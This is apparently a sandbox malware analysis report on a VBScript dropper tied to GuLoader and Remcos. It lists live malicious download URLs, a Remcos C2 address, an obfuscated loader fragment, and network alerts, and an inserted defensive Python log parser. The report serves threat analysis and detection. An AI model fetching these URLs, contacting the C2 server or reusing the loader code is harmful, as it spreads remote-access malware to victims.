                                                                                            1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                            nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                            • geoplugin.net/json.gp
                                                                                            rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bitbucket.org
  https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exe | malicious | Unknown
    • 185.166.143.48
  Z2tJveQl3B.exe | malicious | Unknown
    • 185.166.143.48
  PI and payment confirmed Pdf.exe | malicious | DBatLoader
    • 185.166.143.50
  890927362736.exe | malicious | DBatLoader, FormBook
    • 185.166.143.50
  https://bitbucket.org/aaa14/aaaa/downloads/script3.txt | malicious | Unknown
    • 185.166.143.50
  https://bitbucket.org/aaa14/aaaa/downloads/xwormberlyn.txt | malicious | Unknown
    • 185.166.143.49
  70973273827.exe | malicious | DBatLoader, FormBook
    • 185.166.143.48
  ip4.cmd | malicious | Unknown
    • 185.166.143.48
  Proforma fatura ektedir.exe | malicious | DBatLoader, FormBook
    • 185.166.143.49
  Doc047892345y.exe | malicious | DBatLoader, FormBook
    • 185.166.143.48
s3-w.us-east-1.amazonaws.com
  https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exe | malicious | Unknown
    • 3.5.28.243
  https://www.bing.com/ck/a?!&&p=c60f44e2e0299106bbda17ed4610b6a047eac19fa538687ebec1fc78213d7903JmltdHM9MTcyOTEyMzIwMA&ptn=3&ver=2&hsh=4&fclid=234c270a-e3bc-6c48-2bf3-3210e2866d6d&psq=Siemens+v17&u=a1aHR0cHM6Ly9wbGM0bWUuY29tL2Rvd25sb2FkLXRpYS1wb3J0YWwtdjE3LWZ1bGwtdmVyc2lvbi1nb29nbGVkcml2ZS8&ntb=1 | malicious | Unknown
    • 52.217.121.241
  https://vendor-agreement.s3.amazonaws.com/folder4/doc-11te68fpfa.html | malicious | Unknown
    • 3.5.28.238
  Simple.exe | malicious | Unknown
    • 3.5.28.174
  Simple.exe | malicious | Unknown
    • 3.5.28.119
  PI and payment confirmed Pdf.exe | malicious | DBatLoader
    • 3.5.12.147
  890927362736.exe | malicious | DBatLoader, FormBook
    • 3.5.25.173
  Account report.docx | malicious | Unknown
    • 52.217.103.156
  Account report.docx | malicious | Unknown
    • 3.5.29.61
  https://bitbucket.org/aaa14/aaaa/downloads/script3.txt | malicious | Unknown
    • 3.5.28.88
bg.microsoft.map.fastly.net
  DRUMMONDLTD _ 21ST_OCTOBER_2024 _.PDF | malicious | Unknown
    • 199.232.210.172
  https://docs.google.com/drawings/d/1rNIRSAgTQ9BvkQDgt6I1-bvyHw8Lwl60PfNx3hGnniY/preview?pli=128762876287628762876287628762876 | malicious | Unknown
    • 199.232.210.172
  Carboline Quote Request.eml | malicious | HTMLPhisher
    • 199.232.214.172
  TENDER ADDENDUM NO. 01.vbs | malicious | GuLoader
    • 199.232.214.172
  272766612509812656.js | malicious | Unknown
    • 199.232.210.172
  Aviso de transferencia.exe | malicious | AsyncRAT, PureLog Stealer
    • 199.232.210.172
  258491645830653677.js | malicious | Unknown
    • 199.232.214.172
  ekte.exe | malicious | FormBook
    • 199.232.210.172
  https://library.wic.ac.uk/upload/~/app/step2.php?id=37602430 | malicious | Unknown
    • 199.232.210.172
  https://library.wic.ac.uk/upload/~/app/step3.php?id=5384235 | malicious | Unknown
    • 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US
  Document.xla.xlsx | malicious | Unknown
    • 76.76.21.61
  INV00663.docx | malicious | HTMLPhisher
    • 18.239.83.112
  https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5f | malicious | Unknown
    • 35.163.144.222
  Thermo Fisher RFQ_TFS-1702.xls | malicious | Unknown
    • 76.76.21.98
  Document.xla.xlsx | malicious | Unknown
    • 76.76.21.98
  PO-1021202416777 PNG2023-W111.xls | malicious | Unknown
    • 76.76.21.22
  Thermo Fisher RFQ_TFS-1702.xls | malicious | Unknown
    • 76.76.21.93
  PO-1021202416777 PNG2023-W111.xls | malicious | Unknown
    • 76.76.21.9
  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20= | malicious | HTMLPhisher, Mamba2FA
    • 18.245.31.33
  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2FCGJiV2TYiHhEjaWZAqcgtold/S0pvbmVzQGtvbmlhZy1ncy5jb20= | malicious | HTMLPhisher, Mamba2FA
    • 18.245.31.33
SKHT-ASShenzhenKatherineHengTechnologyInformationCo
  bot.x86.elf | malicious | Mirai, Okiru
    • 154.216.17.159
  bot.mips.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
  bot.m68k.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
  bot.x86_64.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
  bot.mpsl.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
  bot.arm7.elf | malicious | Mirai, Okiru
    • 154.216.17.159
  bot.ppc.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
  bot.sh4.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
  bot.arm5.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
  bot.arm.elf | malicious | Mirai, Gafgyt, Okiru
    • 154.216.17.159
AMAZON-02US
  PO-1021202416777 PNG2023-W111.xls | malicious | Unknown
    • 76.76.21.9
  Document.xla.xlsx | malicious | Unknown
    • 76.76.21.61
  INV00663.docx | malicious | HTMLPhisher
    • 18.239.83.112
  https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5f | malicious | Unknown
    • 35.163.144.222
  Thermo Fisher RFQ_TFS-1702.xls | malicious | Unknown
    • 76.76.21.98
  Document.xla.xlsx | malicious | Unknown
    • 76.76.21.98
  PO-1021202416777 PNG2023-W111.xls | malicious | Unknown
    • 76.76.21.22
  Thermo Fisher RFQ_TFS-1702.xls | malicious | Unknown
    • 76.76.21.93
  PO-1021202416777 PNG2023-W111.xls | malicious | Unknown
    • 76.76.21.9
  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20= | malicious | HTMLPhisher, Mamba2FA
    • 18.245.31.33
FASTLYUS
  https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5f | malicious | Unknown
    • 151.101.128.176
  https://infinconsumer.lh1ondemand.com/ | malicious | Unknown
    • 151.101.128.114
  https://www.google.hn/url?q=//www.google.ee/amp/s/h2f35e7.ubpages.com/bdeda8-f4eb-4ed8-b | malicious | HTMLPhisher
    • 185.199.108.153
  Constate | malicious | Unknown
    • 151.101.67.6
  https://library.wic.ac.uk/upload/~/app/step2.php?id=37602430 | malicious | Unknown
    • 151.101.130.137
  https://library.wic.ac.uk/upload/~/app/step3.php?id=5384235 | malicious | Unknown
    • 151.101.194.137
  https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059 | malicious | HTMLPhisher
    • 151.101.2.132
  https://s3.us-east-2.amazonaws.com/revealedgceconomies/vdiq197yvi/ImgBurn_822881.exe? | malicious | Unknown
    • 185.199.108.133
  http://www.5movierulz.mom | malicious | Unknown
    • 185.199.110.133
  8NR95Z54o9.js | malicious | STRRAT
    • 199.232.196.209
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e
  index.html | malicious | Unknown
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  Ricevuta_di_pagamento.vbs | malicious | GuLoader
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2F28KOjymVGMvsdxoOV3okyunn/S0pvbmVzQGtvbmlhZy1ncy5jb20= | malicious | HTMLPhisher, Mamba2FA
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  https://www.google.co.nz/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Falinegrazielle.com%2FKaW12DtgTK%2Fn8shpNHR5esID4MN5V6n2I56/RENhcm5vdnNreUBrb25pYWctZ3MuY29t | malicious | HTMLPhisher, Mamba2FA
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  index.html | malicious | Unknown
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  TENDER ADDENDUM NO. 01.vbs | malicious | GuLoader
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs | malicious | Remcos, GuLoader
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  RFQ 1307.scr.exe | malicious | Snake Keylogger, VIP Keylogger
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs | malicious | GuLoader
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
  FACTURA RAGOZA.exe | malicious | GuLoader, Snake Keylogger
    • 185.199.108.133
    • 52.217.161.161
    • 185.166.143.48
No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7263224106465184
Encrypted: false
SSDEEP: 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0n:9JZj5MiKNnNhoxu2
MD5: 20CFC810633BADCA9989FBC80B50EB38
SHA1: AC3849B2E3F3A655864FA356BF666BC891DF13E6
SHA-256: 390E6F7B7CB114718735F8608C65A4C826B80251D2238B6FA51634FBEB0A1395
SHA-512: A8BD8145E58BB43D1FDBFC0663A55F0E69FE87A3324D4A3720336AA9A36EC0F9620CC64FA2F2A2894A490729202D8196D466DDE93231475AF525D51135215A9E
Malicious: false
Reputation: low
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage user DataBase, version 0x620, checksum 0x68e0ee62, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7555816831759415
Encrypted: false
SSDEEP: 1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
MD5: BC1D51189410599C6178C3C6E655FE42
SHA1: 268E2E6C7BFF4D971ADDAC4613C906E916AA4105
SHA-256: EAFA6E5F9E671B72FEAD7F2797641AE5B95296D4EDA0481352C29AABAA822E67
SHA-512: 5D8812CF6A42C122EA3D8309C8D97BFC01B4C23D78CAFD146906888E648426F50043070D1E2B4B192D677FE83F1D1415D29991E0A9A5B907518EC63D7D201379
Malicious: false
Reputation: low
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07889440851284857
Encrypted: false
SSDEEP: 3:3mXEYeyyZmh3reuNaAPaU1lI0vVhlXlolluxmO+l/SNxOf:WUzBmhKuNDPaUw+zegmOH
MD5: 6C9A0A118D2B0DCF1E0B27A1B448B42B
SHA1: E95AFA2BEF49881A242B2CFDC1F292D5C53C77EE
SHA-256: A1FA80F7B6BF837F5A7F9112868B49EB9829E39B00EDF931A61328AA4D0D1B83
SHA-512: D7F5C07097E89C7F94BFE62B05D705D7FE109607D9D1D685D423C816BA757599399CC9A32C14358A3FE5CA5A76DF728D9B3006CB10C7C154BF22403ADD72B4B5
Malicious: false
Reputation: low
                                                                                            Preview:.d.......................................;...{.. ....|...!...{?..........!...{?..!...{?..g...!...{?.................o... ....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            File Type:JSON data
                                                                                            Category:modified
                                                                                            Size (bytes):960
                                                                                            Entropy (8bit):5.007342357625525
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:tkhEVBnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwc:qhEV1dVauKyGX85jvXhNlT3/73clHWro
                                                                                            MD5:2384C8ED5D39845A7043C8E4AF84F3F2
                                                                                            SHA1:1A4A72CFF979CDD293034EFDFB35F0C6FA3ABD75
                                                                                            SHA-256:AFB89F4CFEB681642FBADDAFE06E6BFAA298850FDA6771E80BA97B8A79527465
                                                                                            SHA-512:387793D3C3700EFA89D4197DFB11FC667C63C6416068DCC2751953FE6C6EEAA4F2534D32F2F8E9EBB2F5119229BDADB173985E6EF106EFFF71180441197F7291
                                                                                            Malicious:false
                                                                                            Reputation:low
Preview:
{
  "geoplugin_request":"216.52.183.150",
  "geoplugin_status":200,
  "geoplugin_delay":"2ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7157",
  "geoplugin_longitude":"-74",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NlllulX7q/z:NllUO/
                                                                                            MD5:33B27B4D36310772C7A54B3955F9D1A6
                                                                                            SHA1:A578C11DAFD9EEAE67C386945B56798254081E3A
                                                                                            SHA-256:B8F5378861AA615CB830B63DDB3DF06C575F0D4CDF0BC87DDF16C490C99A57E6
                                                                                            SHA-512:1FB6A4FA46B0880902F911ED8A0AD49AAE389F50BBCB33A537A6079125183D9541C514274D24AF341D665E6F016E2D5150B698024A8053712A26143D9810D42F
                                                                                            Malicious:false
                                                                                            Preview:@...e.................................F..............@..........
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Occurrences:6 (the report lists six byte-identical copies of this file, each dropped by powershell.exe)
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):623
                                                                                            Entropy (8bit):4.398152318055047
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:caFqFkLmxyRbmkclkL6hHAFFRRRr6InKrkLteEDle6mQmel3gGn:7QFtUbmjltoRR3teEDleN3elH
                                                                                            MD5:6DBE20513BDFA679A364C53135720434
                                                                                            SHA1:3F025B2B699B589FBBD1853E42BC205A18314B1C
                                                                                            SHA-256:2694E22C80E25960EEB8FBEA6A008F66B8A0880EAEEE73F77D9C3276645E6C3E
                                                                                            SHA-512:42426418F18FFB1C671534E8C23FA452DB4C99C32063BE06153D14E4A8FA20F8AA70661326CACDF73F76BCD7BFDD697F25A3EE899BC08472C2DE971D721982DB
                                                                                            Malicious:false
Preview:
 ______
(_____ \
 _____) )_____ ____ ____ ___ ___
| __ /| ___ | \ / ___) _ \ /___)
| | \ \| ____| | | ( (__| |_| |___ |
|_| |_|_____)_|_|_|\____)___/(___/

Remcos v5.1.3 Light
 BreakingSecurity.net

11:05:23:275 i | Remcos Agent initialized
11:05:23:291 i | Access Level: User
11:05:23:291 i | Connecting | TLS On | 154.216.17.141:5922
11:05:23:322 i | TLS Handshake... | 154.216.17.141:5922
11:05:24:150 i | Connected | TLS On | 154.216.17.141:5922
11:05:24:541 i | KeepAlive | Enabled | Timeout: 60
                                                                                            File type:ASCII text, with CRLF line terminators
                                                                                            Entropy (8bit):5.4346927115613735
                                                                                            TrID:
                                                                                            • Visual Basic Script (13500/0) 100.00%
                                                                                            File name:Order.vbs
                                                                                            File size:15'609 bytes
                                                                                            MD5:56815d5ebf721c3782ecbc8b415f1c0a
                                                                                            SHA1:4bc177cad4a63528f271a3578a12418f96123f69
                                                                                            SHA256:857cc9b2e6ba71e001ff2039a1d3a795e54a8cb99df9362b6ebc255de7aaaad4
                                                                                            SHA512:17d397695b10f7cd8d94ed23cc7f0e7da07ae36133a47365dc3a747e1850196bbc73b86ce34076a25f161d8235b7fc2beddd2e3f3ae3ea5e00822b2b6e984207
                                                                                            SSDEEP:192:yLqqhqxwJrpWlUZVYxIin3lnmLspomTQLGIgAC/rlnCkRcSKWInZo/kpJcGPJZMi:HqJJroZudLsnTaGgPJmxNSiMFpWnk
                                                                                            TLSH:BD626349F7171FF02E2E47248C51F68641A292B83E35F8CD14FED4CC68272A6DE686D9
                                                                                            File Content Preview: 'g..fkrfcIgScpi = rRegisggfgterteadkggns2211 & ""..Call Uglisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#")..Call Uglisging("GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##")..bhdofkjr = LenB("odhdddk")..Cons
                                                                                            Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-21T17:05:19.370699+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 52.217.161.161 | 443 | 192.168.2.6 | 49764 | TCP
2024-10-21T17:05:22.970205+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 185.199.108.133 | 443 | 192.168.2.6 | 49789 | TCP
2024-10-21T17:05:22.970205+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 185.199.108.133 | 443 | 192.168.2.6 | 49789 | TCP
2024-10-21T17:05:24.318537+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49805 | 154.216.17.141 | 5922 | TCP
2024-10-21T17:05:25.552751+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49812 | 178.237.33.50 | 80 | TCP
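As an added triage example, not part of the Joe Sandbox report, the Python below parses a Remcos console log in the format of the 623-byte file RegAsm.exe dropped above (timestamped `|`-separated event lines under a version banner), pulls out the C2 endpoint with its TLS state, and then checks which of the Suricata alerts in the table above touch that endpoint. The log text and the alert rows are constructed from this page; no file name or path is assumed for the log, and the parser accepts any text in that shape.

```python
import re

# Constructed sample: the Remcos console log that RegAsm.exe dropped (previewed in the
# dropped-files list above), with the CRLF line breaks the preview collapsed into dots
# restored. The ASCII-art banner is left out; the parser ignores non-event lines anyway.
SAMPLE_LOG = (
    "Remcos v5.1.3 Light\r\n"
    "BreakingSecurity.net\r\n"
    "11:05:23:275 i | Remcos Agent initialized\r\n"
    "11:05:23:291 i | Access Level: User\r\n"
    "11:05:23:291 i | Connecting | TLS On | 154.216.17.141:5922\r\n"
    "11:05:23:322 i | TLS Handshake... | 154.216.17.141:5922\r\n"
    "11:05:24:150 i | Connected | TLS On | 154.216.17.141:5922\r\n"
    "11:05:24:541 i | KeepAlive | Enabled | Timeout: 60\r\n"
)

# Constructed from the Suricata alert table on this page:
# (sid, signature, severity, src_ip, src_port, dst_ip, dst_port)
SAMPLE_ALERTS = [
    (2049038, "ET MALWARE Malicious Base64 Encoded Payload In Image", 1,
     "52.217.161.161", 443, "192.168.2.6", 49764),
    (2020423, "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1", 1,
     "185.199.108.133", 443, "192.168.2.6", 49789),
    (2020425, "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1", 1,
     "185.199.108.133", 443, "192.168.2.6", 49789),
    (2036594, "ET JA3 Hash - Remcos 3.x/4.x TLS Connection", 1,
     "192.168.2.6", 49805, "154.216.17.141", 5922),
    (2803304, "ETPRO MALWARE Common Downloader Header Pattern HCa", 3,
     "192.168.2.6", 49812, "178.237.33.50", 80),
]

# One event line looks like "HH:MM:SS:mmm <flag> | field | field | ..."
EVENT_RE = re.compile(r"^(?P<ts>\d{2}:\d{2}:\d{2}:\d{3}) (?P<level>\S) \| (?P<body>.+)$")
ENDPOINT_RE = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})\b")
VERSION_RE = re.compile(r"Remcos v(\d+(?:\.\d+)*)(?: (\w+))?")


def parse_remcos_log(text):
    """Return (version, events) for a Remcos console log.

    version is a (number, edition) tuple taken from the banner, or None if absent.
    Each event is {"ts", "level", "fields"}; fields are the '|'-separated parts
    of the line. Banner art and other non-event lines are skipped.
    """
    version = None
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if version is None:
            m = VERSION_RE.search(line)
            if m:
                version = (m.group(1), m.group(2))
        m = EVENT_RE.match(line)
        if m:
            fields = [f.strip() for f in m.group("body").split("|")]
            events.append({"ts": m.group("ts"), "level": m.group("level"), "fields": fields})
    return version, events


def extract_c2(events):
    """Map every ip:port the agent mentioned to what the log says about it.

    state is "connected" once a "Connected" event names the endpoint and
    "attempted" otherwise; tls is True/False when a "TLS On"/"TLS Off" field
    appeared on the same line; first_seen is the timestamp of the first mention.
    """
    c2 = {}
    for ev in events:
        for ip, port in ENDPOINT_RE.findall(" ".join(ev["fields"])):
            entry = c2.setdefault((ip, int(port)),
                                  {"state": "attempted", "tls": None, "first_seen": ev["ts"]})
            if ev["fields"][0] == "Connected":
                entry["state"] = "connected"
            if "TLS On" in ev["fields"]:
                entry["tls"] = True
            elif "TLS Off" in ev["fields"]:
                entry["tls"] = False
    return c2


def correlate_alerts(c2, alerts):
    """Return (sid, signature) for alerts whose either side is a known C2 endpoint."""
    return [(sid, sig) for sid, sig, _sev, src, sport, dst, dport in alerts
            if (src, sport) in c2 or (dst, dport) in c2]


if __name__ == "__main__":
    version, events = parse_remcos_log(SAMPLE_LOG)
    c2 = extract_c2(events)
    print("Remcos version:", version)
    for (ip, port), info in c2.items():
        print(f"C2 {ip}:{port} state={info['state']} tls={info['tls']} first_seen={info['first_seen']}")
    for sid, sig in correlate_alerts(c2, SAMPLE_ALERTS):
        print(f"corroborating alert SID {sid}: {sig}")
```

On this sample the only endpoint is 154.216.17.141:5922, reached over TLS and confirmed connected, and the single alert that corroborates it is the JA3-based Remcos signature (SID 2036594); the base64-in-image and downloader-header alerts are on different hosts and belong to the earlier stager traffic, not to the RAT session.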
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 21, 2024 17:05:15.520431995 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:15.520463943 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:15.520543098 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:15.532932043 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:15.532951117 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.124319077 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.124469042 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:16.159090996 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:16.159121037 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.159605026 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.172523022 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:16.215347052 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.511168957 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.511198044 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.511256933 CEST | 443 | 49758 | 185.166.143.48 | 192.168.2.6
Oct 21, 2024 17:05:16.511274099 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:16.511305094 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:16.515239000 CEST | 49758 | 443 | 192.168.2.6 | 185.166.143.48
Oct 21, 2024 17:05:16.543337107 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:16.543382883 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
Oct 21, 2024 17:05:16.543528080 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:16.543965101 CEST | 49764 | 443 | 192.168.2.6 | 52.217.161.161
Oct 21, 2024 17:05:16.543988943 CEST | 443 | 49764 | 52.217.161.161 | 192.168.2.6
